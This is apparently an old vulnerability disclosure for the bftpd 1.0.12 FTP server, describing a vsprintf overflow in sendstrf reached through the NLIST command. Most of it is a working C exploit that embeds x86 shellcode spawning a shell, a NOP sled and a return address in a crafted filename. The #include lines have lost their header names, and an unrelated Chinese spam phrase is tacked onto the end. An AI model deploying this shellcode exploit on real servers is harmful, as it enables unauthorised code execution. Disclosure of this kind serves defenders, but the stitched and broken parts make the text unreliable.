There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf: int sendstrf(int s, char *format, ...) { .... vsprintf(buffer, format, val); when the function is called from NLIST command: else foo = 1; sendstrf(s, entry->d_name); } This can be used to overflow the buffer of the vsprintf and execute arbitrary code. I don't think it can be normally used for a remote attack because bftpd removes all non-printable characters from input strings and so it is not possible to remotely put a shellcode in a filename. A dimostrative code is attached. asynchro@pkcrew.org www.pkcrew.org /* Creates a filname to exploit the bug in bftpd 1.0.12 Create the file, cwd in the shell directory and nlist the file directory (sh is executed in the working dir because it is not possible to insert a / in the filename) hints by |CyRaX| & Cthulhu coded by asynchro www.pkcrew.org */ #include #include #define BUFSIZE 512 #define NOP 124 main() { int i; char *buff; char nop=0x90; char addr[]="\xd4\xf9\xff\xbf"; char command[]="touch %.260x"; char shellcode[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xffsh"; buff=(char *) malloc(BUFSIZE); memset(buff,0x0,BUFSIZE); memcpy(buff,command,sizeof(command)); strncat(buff,addr,4); strncat(buff,addr,4); for(i=0; i < NOP ;i++) { strncat(buff,&nop,1); } strncat(buff,shellcode,strlen(shellcode)); system(buff); }

亚洲欧美在线